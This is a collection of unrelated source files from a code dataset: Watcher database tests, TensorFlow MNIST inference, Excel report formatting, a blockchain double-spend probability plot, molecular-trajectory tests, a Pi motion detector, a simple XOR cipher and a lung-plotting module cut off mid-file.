res])\n\n res = self.dbapi.get_action_plan_list(\n self.context,\n filters={'audit_uuid': audit['uuid']})\n\n for r in res:\n self.assertEqual(audit['id'], r.audit_id)\n\n def test_get_action_plan_by_id(self):\n created = self._create_test_action_plan()\n action_plan = self.dbapi.get_action_plan_by_id(\n self.context, created['id'])\n self.assertEqual(created['uuid'], action_plan.uuid)\n\n def test_get_action_plan_by_uuid(self):\n created = self._create_test_action_plan()\n action_plan = self.dbapi.get_action_plan_by_uuid(\n self.context, created['uuid'])\n self.assertEqual(created['id'], action_plan.id)\n\n def test_get_action_plan_that_does_not_exist(self):\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.get_action_plan_by_id, self.context, 1234)\n\n def test_update_action_plan(self):\n action_plan = self._create_test_action_plan()\n res = self.dbapi.update_action_plan(\n action_plan['id'], {'name': 'updated-model'})\n self.assertEqual('updated-model', res.name)\n\n def test_update_action_plan_that_does_not_exist(self):\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.update_action_plan, 1234, {'name': ''})\n\n def test_update_action_plan_uuid(self):\n action_plan = self._create_test_action_plan()\n self.assertRaises(exception.InvalidParameterValue,\n self.dbapi.update_action_plan, action_plan['id'],\n {'uuid': 'hello'})\n\n def test_destroy_action_plan(self):\n action_plan = self._create_test_action_plan()\n self.dbapi.destroy_action_plan(action_plan['id'])\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.get_action_plan_by_id,\n self.context, action_plan['id'])\n\n def test_destroy_action_plan_by_uuid(self):\n uuid = 
w_utils.generate_uuid()\n self._create_test_action_plan(uuid=uuid)\n self.assertIsNotNone(self.dbapi.get_action_plan_by_uuid(\n self.context, uuid))\n self.dbapi.destroy_action_plan(uuid)\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.get_action_plan_by_uuid,\n self.context, uuid)\n\n def test_destroy_action_plan_that_does_not_exist(self):\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.destroy_action_plan, 1234)\n\n def test_destroy_action_plan_that_referenced_by_actions(self):\n action_plan = self._create_test_action_plan()\n action = utils.create_test_action(action_plan_id=action_plan['id'])\n self.assertEqual(action_plan['id'], action.action_plan_id)\n self.assertRaises(exception.ActionPlanReferenced,\n self.dbapi.destroy_action_plan, action_plan['id'])\n\n def test_create_action_plan_already_exists(self):\n uuid = w_utils.generate_uuid()\n self._create_test_action_plan(id=1, uuid=uuid)\n self.assertRaises(exception.ActionPlanAlreadyExists,\n self._create_test_action_plan,\n id=2, uuid=uuid)\n","sub_path":"watcher/tests/db/test_action_plan.py","file_name":"test_action_plan.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142677486","text":"# restore trained data\nimport cv2\nimport scipy\nimport tensorflow as tf\nimport numpy as np\nimport os\n\n\ndef print_float(value):\n if value >= 0.5:\n return '%.1f' % value\n else:\n return ' . '\n\n\ndef print_int(value):\n if value < 125:\n return ' '\n else:\n return 'X'\n\nnp.set_printoptions(formatter={'float': print_float,\n 'int': print_int})\n\n\nimport sys\nsys.path.append('mnist')\nimport model\n\nx = tf.placeholder(\"float\", [None, 784])\nsess = tf.Session()\n\nwith tf.variable_scope(\"simple\"):\n y1, variables = model.simple(x)\nsaver = tf.train.Saver(variables)\nsaver.restore(sess, \"mnist/data/simple.ckpt\")\n\n\ndef simple(input):\n return sess.run(y1, feed_dict={x: input}).flatten().tolist()\n\n\nwith tf.variable_scope(\"convolutional\"):\n keep_prob = tf.placeholder(\"float\")\n y2, variables = model.convolutional(x, keep_prob)\nsaver = tf.train.Saver(variables)\nsaver.restore(sess, \"mnist/data/convolutional.ckpt\")\n\n\ndef convolutional(input):\n return sess.run(y2, feed_dict={x: input, keep_prob: 1.0}).flatten().tolist()\n\n\ndef print_rating(arr):\n for i, value in enumerate(arr):\n print('{}: {:.2%}'.format(i, value))\n\n\ndef main(sample_name):\n sample_path = os.path.join('samples/orig/', sample_name)\n arr = cv2.imread(sample_path, cv2.IMREAD_GRAYSCALE)\n print(arr)\n # print(arr)\n input = ((255 - arr) / 255.0).reshape(1, 784)\n output1 = simple(input)\n output2 = convolutional(input)\n print('simple:')\n print_rating(output1)\n print('\\n')\n print('convoltional:')\n print_rating(output2)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n sample_name = sys.argv[1]\n else:\n sample_name = '0-1.png'\n main(sample_name)","sub_path":"run_sample.py","file_name":"run_sample.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"148301828","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 25 16:28:21 2020\n\n@author: amoynihan\n\"\"\"\n\nimport xlsxwriter as excel\nimport numpy as np\nconfirmURL = 'Please confirm this URL is functional. If not, please provide updated URL.'\nnotFunctional = 'URL not functional. 
Please provide updated web address [External links only]'\nnotLoaded = 'Content not yet loaded - link will be updated in next QA phase'\norgo = 'This item was organically referenced in your content, but we do not have it in our inventory. Please send us this content for upload, or let us know if you would prefer the item stay unlinked in your content'\nsendUsContent = '''We do not have this content item in our inventory. Please send it to us for upload, or confirm the current URL is functional '''\n\ndef formatBLD(dframe,sheetName, workbook):\n \n \n sheetName.write('Z21', confirmURL)\n sheetName.write('Z22', notFunctional)\n sheetName.write('Z23', notLoaded)\n sheetName.write('Z24', orgo)\n sheetName.write('Z25', sendUsContent)\n sheetName.set_column('Z:Z', None, None, {'hidden':True})\n \n sheetName.set_column('A:C', 28.07)\n sheetName.set_column('D:D', 16.61)\n sheetName.set_column('E:E', 28.07)\n sheetName.set_column('F:F', 10.83)\n sheetName.set_column('G:G',28.07)\n sheetName.set_column('H:H',8.67) \n sheetName.set_column('I:I',33.43)\n sheetName.set_column('J:J',16.61)\n sheetName.set_column('K:K', 24.46)\n sheetName.set_column('L:L', 20.74) \n dframe = dframe.fillna(0)\n title = workbook.add_format({'bold':True})\n title.set_font_color('#ffffff')\n title.set_bg_color('#263441')\n sheetName.write(0, 0, 'Source', title)\n sheetName.write(0,1, 'Parent Procedure ID', title)\n sheetName.write(0,2, 'Procedure Title', title)\n sheetName.write(0,3, 'Category', title)\n sheetName.write(0,4, 'System ID', title)\n sheetName.write(0,5, 'Content Type', title)\n sheetName.write(0,6, 'Title', title)\n sheetName.write(0,7, 'Published', title)\n sheetName.write(0,8, 'BrokenLink', title)\n sheetName.write(0,9, 'Linked Text', title)\n sheetName.write(0,10, 'Request', title)\n sheetName.write(0,11, 'Customer Response', title) \n \n blue = workbook.add_format()\n\n blue.set_bg_color('#d4dee8')\n blue.set_text_wrap()\n blue.set_border(1)\n sheetName.set_header('Broken Link Report Detail')\n \n white = workbook.add_format()\n white.set_bg_color('#ffffff')\n white.set_text_wrap()\n white.set_border(1)\n \n format2 = workbook.add_format({'bg_color': '#C6EFCE'})\n \n row = 0\n col = 0\n for index, rows in dframe.iterrows():\n if (row+1) % 2 == 1:\n sheetName.write(row+1, 0, rows['Source'],blue)\n sheetName.write(row+1, col+1, rows['Parent Procedure ID'], blue)\n sheetName.write(row+1, col+2, rows['Procedure Title'], blue)\n sheetName.write(row+1 , col+3, rows['Category'],blue)\n sheetName.write(row+1, col+4, rows['System ID'],blue)\n sheetName.write(row+1, col+5, rows['Content Type'],blue)\n sheetName.write(row+1, col+6, rows['Title'],blue)\n sheetName.write(row+1, col+7, rows['Published'],blue)\n sheetName.write(row+1, col+8, rows['BrokenLink'],blue)\n sheetName.write(row+1, col+9, rows['Linked Text'],blue)\n sheetName.write(row+1, col+10, rows['Request'],blue)\n # '+2' maps the 0-indexed data row to its 1-indexed A1 cell in column K\n sheetName.data_validation('K'+ str(row+2), {'validate':'list',\n 'source': '=$Z$21:$Z$25'})\n # Customer Response lives in column L (index col+11)\n sheetName.write(row+1, col+11, rows['Customer Response'],blue)\n row+=1\n else:\n sheetName.write(row+1, 0, rows['Source'], white)\n sheetName.write(row+1, col+1, rows['Parent Procedure ID'],white)\n sheetName.write(row+1, col+2, rows['Procedure Title'],white)\n sheetName.write(row+1 , col+3, rows['Category'], white)\n sheetName.write(row+1, col+4, rows['System ID'], white)\n sheetName.write(row+1, col+5, rows['Content Type'], white)\n sheetName.write(row+1, col+6, rows['Title'], white)\n sheetName.write(row+1, 
col+7, rows['Published'], white)\n sheetName.write(row+1, col+8, rows['BrokenLink'], white)\n sheetName.write(row+1, col+9, rows['Linked Text'], white)\n sheetName.write(row+1, col+10, rows['Request'], white)\n # '+2' maps the 0-indexed data row to its 1-indexed A1 cell in column K\n sheetName.data_validation('K'+ str(row+2), {'validate':'list',\n 'source': '=$Z$21:$Z$25'})\n \n # Customer Response lives in column L (index col+11)\n sheetName.write(row+1, col+11, rows['Customer Response'], white)\n row+=1\n sheetName.conditional_format('H1:H80', {'type': 'cell',\n 'criteria':'=',\n 'value': 'TRUE',\n 'format': format2}) \n \ndef formatSum(worksheetName, workbook):\n sumFormat = workbook.add_format()\n sumFormat.set_border(1)\n sumFormat.set_bg_color('#a5a5a5')\n sumFormat.set_align('center')\n sumFormat.set_font_color('#FFFFFF')\n \n bold = workbook.add_format({'bold':True})\n blank = workbook.add_format()\n blank.set_border(1)\n blank.set_text_wrap()\n bold.set_border(1)\n bold.set_text_wrap()\n \n worksheetName.write('A1', 'Total Broken Links Identified', sumFormat)\n worksheetName.set_column(0, 0, 47.57)\n \n worksheetName.write('A2', 'Total Items Containing Broken Links', sumFormat)\n \n worksheetName.write('A3', 'Unique Broken Links', sumFormat)\n \n worksheetName.write('A6', 'Broken Link Type', sumFormat)\n worksheetName.write('B6', 'Cause', sumFormat)\n worksheetName.write('C6', 'Total', sumFormat)\n worksheetName.write('A7', 'Link Opportunity Identified', bold)\n worksheetName.write('B7', orgo, blank)\n \n worksheetName.write('A8', 'Content not in SilverCloud Inventory', bold )\n worksheetName.write('B8', sendUsContent, blank)\n worksheetName.write('A9', 'SilverCloud Cannot Validate URL (internal links)', bold )\n worksheetName.write('B9', confirmURL,blank)\n worksheetName.write('A10', 'Broken Link (external links)', bold)\n worksheetName.write('B10', notFunctional, blank)\n worksheetName.write('A11', 'Content Not in Knowledgebase', bold)\n worksheetName.write('B11', notLoaded,blank)\n \n \n worksheetName.write('B1','', blank)\n worksheetName.write('B2', '', blank)\n worksheetName.write('B3', '', blank)\n worksheetName.write('C7', '', blank)\n worksheetName.write('C8', '', blank)\n worksheetName.write('C9', '', blank)\n worksheetName.write('C10', '', blank)\n worksheetName.write('C11', '', blank)\n \n \n worksheetName.set_column(1,1, 34)\n worksheetName.set_column(2,2, 10.29)\n worksheetName.set_row(6, 90)\n worksheetName.set_row(7, 60)\n worksheetName.set_row(8,30)\n worksheetName.set_row(15, 36.75)\n worksheetName.merge_range('A17:C17', 'Please note: SilverCloud does not validate email addresses, and as such none are featured in these reports.', blank)\n \n worksheetName.merge_range('A14:C14', 'Instructions', sumFormat)\n worksheetName.merge_range('A15:C16', 'Please use the Unique URL Validation tab to confirm the functionality of the URLs provided, or to provide additional instruction to SilverCloud. 
The Broken Links - Detail tab offers an inventory of all broken links and their location within content (for reference)', blank)\n worksheetName.write_formula('C7', '=COUNTIF(\'Broken Links-Detail\'!K:K,Summary!B7)',blank)\n worksheetName.write_formula('C8', '=COUNTIF(\'Broken Links-Detail\'!K:K,Summary!B8)',blank)\n worksheetName.write_formula('C9', '=COUNTIF(\'Broken Links-Detail\'!K:K,Summary!B9)',blank)\n worksheetName.write_formula('C10', '=COUNTIF(\'Broken Links-Detail\'!K:K,Summary!B10)',blank) \n worksheetName.write_formula('C11', '=COUNTIF(\'Broken Links-Detail\'!K:K,Summary!B11)',blank)\n worksheetName.write_formula('B1', '=COUNTIF(\'Broken Links-Detail\'!I:I,\\\"*\\\")',blank)\n worksheetName.write_formula('B3', '=COUNTIF(\'Unique URL Validation\'!A:A, \\\"*\\\")', blank)\ndef formatUnique(worksheetName, workbook, dataframe):\n worksheetName.set_column('A:A', 42.43)\n worksheetName.set_column('B:B', 67.57)\n worksheetName.set_column('C:C', 50.71)\n \n uniqueTitlesFormat = workbook.add_format({'bold': True})\n uniqueTitlesFormat.set_bg_color('#263441')\n uniqueTitlesFormat.set_font_color('#FFFFFF')\n \n worksheetName.write('A1', 'Broken Link', uniqueTitlesFormat)\n worksheetName.write('B1', 'Request', uniqueTitlesFormat)\n worksheetName.write('C1', 'Customer Response', uniqueTitlesFormat)\n \n blue = workbook.add_format()\n blue.set_bg_color('#d4dee8')\n blue.set_text_wrap()\n blue.set_border(1)\n \n white = workbook.add_format()\n white.set_bg_color('#ffffff')\n white.set_text_wrap()\n white.set_border(1)\n \n row = 0\n vlook = 1\n for item in dataframe:\n if (row+1) % 2 == 1:\n worksheetName.write(row+1, 0, str(item), blue)\n worksheetName.write_formula('B' + str(vlook+1),'=VLOOKUP(A%s,\'Broken Links-Detail\'!I1:K80, 3, FALSE)' %(str(vlook+1)),blue)\n worksheetName.write(row+1, 2, ' ' , blue)\n row+=1\n vlook+=1\n else:\n worksheetName.write(row+1, 0, str(item), white) \n worksheetName.write_formula('B' + str(vlook+1),'=VLOOKUP(A%s,\'Broken Links-Detail\'!I1:K80, 3, FALSE)' %(str(vlook+1)),white)\n worksheetName.write(row+1, 2, ' ', white)\n row+=1\n vlook+=1\n \n ","sub_path":"Broken Link Report/excelFormatter.py","file_name":"excelFormatter.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"52222572","text":"# This script computes the probability that a blockchain fork (double-spend) attack succeeds\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei'] # font setup originally used to render CJK axis labels\nimport numpy as np\ndef attack(q,z):\n\tp=1.0-q\n\tlambd=z*q/p\n\tsum=1.0\n\tfor i in range(0,z+1):\n\t\tpoisson=np.exp(-lambd)\n\t\tfor j in range(1,i+1):\n\t\t\tpoisson=poisson*lambd/j\n\t\tsum=sum-poisson*(1-np.power(q/p,z-i))\n\treturn sum\n\nif __name__ == '__main__':\n\tzz=range(1,40)\n\tl1=[]\n\tl2=[]\n\tl3=[]\n\tfor z in zz:\n\t\tl1.append(max(attack(0.1,z),0))\n\t\tl2.append(max(attack(0.3,z),0))\n\t\tl3.append(max(attack(0.4,z),0))\n\tplt.plot(zz,l1,label=\"q=0.1\")\n\tplt.plot(zz,l2,label=\"q=0.3\")\n\tplt.plot(zz,l3,label=\"q=0.4\")\n\tplt.xlabel(u\"Attacker trails the main chain by z blocks\")\n\tplt.ylabel(u\"Probability of a successful attack\")\n\tplt.legend()\n\tplt.show()","sub_path":"block/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"171670604","text":"import unittest\nfrom pytraj import io as mdio\nfrom pytraj import Trajectory\nfrom pytraj.utils.check_and_assert import assert_almost_equal as aa_eq\n\nclass Test(unittest.TestCase):\n def 
test_0(self):\n traj = mdio.iterload(\"./data/md1_prod.Tc5b.x\", \"./data/Tc5b.top\")\n FA = traj[:]\n\n print (traj['@CA'])\n frame0 = traj[0]\n print (hasattr(frame0, 'shape'))\n aa_eq(frame0[traj.top(\"@CA\")].flatten(), \n traj['@CA'].xyz.flatten())\n\n # slicing with list or array\n indices = [1, 2, 3]\n fa = traj[indices]\n fa2 = FA[indices]\n fa3 = traj[range(1, 4)]\n fa4 = FA[range(1, 4)]\n self.assertIsInstance(fa, Trajectory)\n # from TrajectoryIterator\n aa_eq(fa[0].coords, traj[1].coords)\n aa_eq(fa[1].coords, traj[2].coords)\n # from Trajectory\n aa_eq(fa2[1].coords, traj[2].coords)\n aa_eq(fa2[0].coords, traj[1].coords)\n\n # from \"range\"\n aa_eq(fa3[1].coords, traj[2].coords)\n aa_eq(fa3[0].coords, traj[1].coords)\n aa_eq(fa4[1].coords, traj[2].coords)\n aa_eq(fa4[0].coords, traj[1].coords)\n\n def test_1(self):\n # AtomMask\n traj = mdio.iterload(\"./data/md1_prod.Tc5b.x\", \"./data/Tc5b.top\")\n fa = traj.to_mutable_trajectory()\n xyz = traj.xyz[:]\n atm = traj.top.select(\"@CA\")\n indices = atm.indices\n\n aa_eq(fa[0, atm], fa[0][atm])\n aa_eq(traj[0, atm], fa[0][atm])\n aa_eq(traj[0, atm, 0], fa[0][atm, 0])\n aa_eq(traj[0, atm, 0], xyz[0][indices][0])\n aa_eq(traj[0, '@CA', 0], xyz[0][indices][0])\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_fancy_indexing_2.py","file_name":"test_fancy_indexing_2.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"92063165","text":"#!/usr/bin/python3\nimport contextlib\nimport cv2\nimport numpy as np\nimport threading\nimport time\nfrom picamera import PiCamera\n\n\nclass MotionDetector:\n def __init__(self):\n self.requestBorrow = threading.Event()\n self.beginBorrow = threading.Event()\n self.endBorrow = threading.Event()\n self.thread = threading.Thread(target=self._threadMain, daemon=True)\n self.lastMotionImage = None\n self.lastMotionTime = 0\n\n def start(self):\n self.thread.start()\n\n @contextlib.contextmanager\n def borrowCamera(self):\n self.requestBorrow.set()\n self.beginBorrow.wait()\n self.beginBorrow.clear()\n try:\n with PiCamera() as camera:\n yield camera\n finally:\n self.endBorrow.set()\n\n def _threadMain(self):\n while True:\n self._run()\n self.requestBorrow.clear()\n self.beginBorrow.set()\n self.endBorrow.wait()\n self.endBorrow.clear()\n\n def _run(self):\n width, height, blur, weight, threshold, minArea, minFrames = 640, 480, 2, 0.2, 5, 6000, 3\n avgFrame, nFrames = None, 0\n with PiCamera() as camera:\n camera.resolution = (width, height)\n camera.video_denoise = False\n camera.image_effect = 'blur'\n camera.image_effect_params = (blur,)\n\n yuv = np.empty((int(width * height * 1.5),), dtype=np.uint8)\n for x in camera.capture_continuous(yuv, format='yuv', use_video_port=True):\n image = yuv[:width*height].reshape((height, width))\n if avgFrame is None:\n avgFrame = image.copy().astype('float')\n else:\n cv2.accumulateWeighted(image, avgFrame, weight)\n delta = cv2.absdiff(image, cv2.convertScaleAbs(avgFrame))\n thresh = cv2.threshold(\n delta, threshold, 255, cv2.THRESH_BINARY)[1]\n thresh = cv2.dilate(thresh, None, iterations=2)\n\n hasMotion = False\n for contour in cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[1]:\n if cv2.contourArea(contour) < minArea:\n continue\n hasMotion = True\n\n if hasMotion:\n nFrames += 1\n if nFrames == minFrames:\n self.lastMotionImage = image.copy()\n self.lastMotionTime = time.time()\n else:\n nFrames = 0\n\n if 
self.requestBorrow.is_set():\n return\n time.sleep(0.1)\n","sub_path":"motion.py","file_name":"motion.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"9073072","text":"import glob\nimport os\nimport codecs\nfrom general.general import clear_files\n\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\n# source_files_dir = \"/home/michael/Downloads/\"\nsource_files_dir = \"/home/michael/Downloads/\"\n\nsource_files_mask = source_files_dir + \"*.csv\"\n\n\n\n\n# 'utf-8', 'windows-1251'\nREAD_ENCODING = 'windows-1251'\nWRITE_ENCODING = 'windows-1251'\n\nresult_file_dir = os.path.join(current_dir, \"../CombinedFiles\")\n\nclear_files(result_file_dir)\n\nresult_file = os.path.join(result_file_dir, 'result.csv')\n\nfile_list = glob.glob(source_files_mask)\n\n\ndef combine(first_column_only = False):\n if first_column_only:\n counter = 1\n for a_file in file_list:\n with codecs.open(a_file, 'r', encoding=READ_ENCODING) as r_file:\n while True:\n try:\n line = r_file.readline()\n except UnicodeDecodeError:\n continue # Hit a line that is not in the expected encoding; Bukvarix, for example, may append such lines at the end of a file.\n if (not line):\n break\n try:\n start_pos = line.index('\"')\n end_pos = line.index('\"', start_pos + 1)\n except ValueError:\n continue # No quote character found in the line.\n\n\n with codecs.open(result_file, 'a', encoding=WRITE_ENCODING) as w_file:\n phrase = line[start_pos+1:end_pos]\n w_file.write(\"{}\\n\".format(phrase))\n print(\"{}:{}\".format(counter, phrase))\n counter += 1\n\n else:\n\n for a_file in file_list:\n with codecs.open(a_file, 'r', encoding = READ_ENCODING) as file:\n try:\n lines = file.read()\n except UnicodeDecodeError:\n continue\n\n with codecs.open(result_file, 'a', encoding = WRITE_ENCODING) as file:\n try:\n file.write(lines)\n except UnicodeEncodeError:\n pass # Set a breakpoint here and inspect each failing case individually.\n\n\ncombine(first_column_only = True)","sub_path":"combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"175950123","text":"# coding: utf-8\nimport argparse\nimport logging\nfrom random import seed\n\nfrom synergine2.log import get_default_logger\nfrom synergine2.config import Config\nfrom synergine2_cocos2d.const import SELECTION_COLOR_RGB\nfrom synergine2_cocos2d.util import get_map_file_path_from_dir\nfrom synergine2.core import Core\nfrom synergine2.cycle import CycleManager\nfrom synergine2.terminals import TerminalManager\n\nfrom opencombat.const import FLAG, SIDE\nfrom opencombat.const import FLAG_DE\nfrom opencombat.const import DE_COLOR\nfrom opencombat.const import URSS_COLOR\nfrom opencombat.const import FLAG_URSS\nfrom opencombat.simulation.subject import ManSubject\nfrom opencombat.simulation.subject import TankSubject\nfrom opencombat.simulation.base import TileStrategySimulation\nfrom opencombat.simulation.base import TileStrategySubjects\nfrom opencombat.terminal.base import CocosTerminal\n\n\ndef main(map_dir_path: str, seed_value: int=None):\n if seed_value is not None:\n seed(seed_value)\n\n config = Config()\n config.load_yaml('config.yaml')\n level = logging.getLevelName(config.resolve('global.logging_level', 'ERROR'))\n logger = get_default_logger(level=level)\n\n map_file_path = get_map_file_path_from_dir(map_dir_path)\n\n simulation = TileStrategySimulation(config, 
map_file_path=map_file_path)\n subjects = TileStrategySubjects(simulation=simulation)\n\n for position in ((10, 2), (11, 3), (11, 4), (12, 5),):\n man = ManSubject(\n config=config,\n simulation=simulation,\n position=position,\n properties={\n SELECTION_COLOR_RGB: DE_COLOR,\n FLAG: FLAG_DE,\n SIDE: 'AXIS',\n }\n )\n subjects.append(man)\n\n for position in ((30, 15), (31, 16), (32, 17), (33, 18),):\n man = ManSubject(\n config=config,\n simulation=simulation,\n position=position,\n properties={\n SELECTION_COLOR_RGB: URSS_COLOR,\n FLAG: FLAG_URSS,\n SIDE: 'ALLIES',\n }\n )\n subjects.append(man)\n\n for position in ((38, 24),):\n man = TankSubject(\n config=config,\n simulation=simulation,\n position=position,\n properties={\n SELECTION_COLOR_RGB: URSS_COLOR,\n FLAG: FLAG_URSS,\n SIDE: 'ALLIES',\n }\n )\n subjects.append(man)\n\n simulation.subjects = subjects\n\n core = Core(\n config=config,\n simulation=simulation,\n cycle_manager=CycleManager(\n config=config,\n simulation=simulation,\n ),\n terminal_manager=TerminalManager(\n config=config,\n terminals=[CocosTerminal(\n config,\n asynchronous=False,\n map_dir_path=map_dir_path,\n )]\n ),\n cycles_per_seconds=1 / config.resolve('core.cycle_duration'),\n )\n core.run()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run TileStrategy')\n parser.add_argument('map_dir_path', help='map directory path')\n parser.add_argument('--seed', dest='seed', default=None)\n\n args = parser.parse_args()\n\n main(args.map_dir_path, seed_value=args.seed)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609198444","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\n\n# Register your models here.\nfrom api.models.mass_models import Song, Author, MassMoment, Mass\n\n\nclass MassMomentInline(admin.StackedInline):\n model = MassMoment\n extra = 1\n\n\nclass MassAdmin(admin.ModelAdmin):\n fields = ['description', 'day']\n inlines = [MassMomentInline]\n\n\nadmin.site.register(Song)\nadmin.site.register(Author)\nadmin.site.register(Mass, MassAdmin)\n\nadmin.site.site_header = \"Glorify\"\nadmin.site.site_title = \"Glorify - Sua liturgia acessível\"\n","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202411106","text":"import binascii\nfrom itertools import cycle\n\ndef xor(xs, ys):\n return \"\".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, cycle(ys)))\n\nif __name__ == \"__main__\":\n a = raw_input(\"1 key\\n\")\n b = raw_input(\"2 key\\n\")\n c = xor(a,b)\n h = binascii.b2a_hex(c)\n print(h)\n","sub_path":"set1/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"103281223","text":"import sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nsys.setrecursionlimit(10 ** 7)\n\nfrom collections import defaultdict\nfrom itertools import accumulate\n\nn, m, *a = map(int, read().split())\ndict = defaultdict(int)\nans = 0\nfor v in [0] + list(map(lambda x: int(x) % m, list(accumulate(a)))):\n ans += dict[v]\n dict[v] += 
1\nprint(ans)\n","sub_path":"submissions/abc105/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"507320710","text":"import json\nfrom pprint import pprint\nfrom pathlib import Path\n\n\ndef load_data(file_path='markets.json'):\n \"\"\" Load data from a file\n :param file_path: path to the source file in ANSI encoding\n :return: dict with the loaded data\n \"\"\"\n if Path(file_path).is_file():\n with open(file_path) as data_file:\n data = json.load(data_file)\n return data\n else:\n exit('file not found')\n\n\nif __name__ == '__main__':\n path = input('Enter the path to a file, e.g. bars.json ')\n data = load_data(path)\n pprint(data)\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158372050","text":"'''\nlung_plots.py \nhandles plotting trajectories on the lung\n\nJ.Sganga 9/2/2016\n'''\n\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.colors import ListedColormap, BoundaryNorm\nfrom matplotlib import gridspec\nimport matplotlib.lines as mlines\n\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes, zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\nimport seaborn.apionly as sns # doesn't change the rcparams\n\n\nfrom load_history import history_data\nfrom figure_settings import icra\nicra = icra()\n\nsys.path.append('..')\nfrom lung_fit.transform_lung import get_transformed_lung\nfrom functions.computer_specific_paths import computer_paths\ncomputer_paths = computer_paths()\n\nblue, green, red, purple, yellow, cyan = sns.color_palette(\"deep\")[:]\ndefault_colors = [blue, green, red, purple, yellow, cyan]\ngrey = sns.xkcd_palette([\"greyish\"])[0]\n\nblues_cmap = 'Blues'# 0x71a3a58\n\nsheath_list = [0, 1, 2, 3]\nleader_list = [4, 5, 6, 7]\n\n\n\n\nclass plot_lung(object):\n \"\"\"holds history data from a lung run and plots it on the lung stl\"\"\"\n def __init__(self, history_files, run_names):\n self.run_list = []\n for file in history_files:\n self.run_list.append(history_data(file = file))\n self.run_names = run_names\n self.get_lung()\n self.offset = np.array([44, -78, -110]) # mm, positions lung nicely relative to plotting axes\n self.lung -= self.offset \n self.x_sensed = [] # lists contain each run's arrays\n self.x_desired = []\n for run in self.run_list:\n self.x_sensed.append(run.x_sensed[:,:3] - self.offset)\n self.x_desired.append(run.x_desired[:,:3] - self.offset)\n self.find_way_point_indeces()\n\n\n def get_lung(self): \n self.lung, self.guide_trace = get_transformed_lung()\n \n def check_lung_fit(self):\n ax_xy = self.plot_lung_cloud(1, 0)\n ax_xy.plot(self.guide_trace[:,1], self.guide_trace[:,0], 'k.', alpha = 0.05)\n\n ax_xz = self.plot_lung_cloud(2, 0) # the guide trace is drawn explicitly on the next line\n ax_xz.plot(self.guide_trace[:,2], self.guide_trace[:,0], 'k.', alpha = 0.05)\n return ax_xy, ax_xz\n\n def find_way_point_indeces(self):\n self.indeces = []\n for i_run, run in enumerate(self.run_list):\n index_list = []\n for data_pt in range(len(run.time_pts) - 1):\n if self.is_transition_point(i_run, data_pt):\n index_list.append(data_pt)\n index_list.append(len(run.time_pts))\n self.indeces.append(index_list)\n self.indeces = np.asarray(self.indeces).T # columns = 
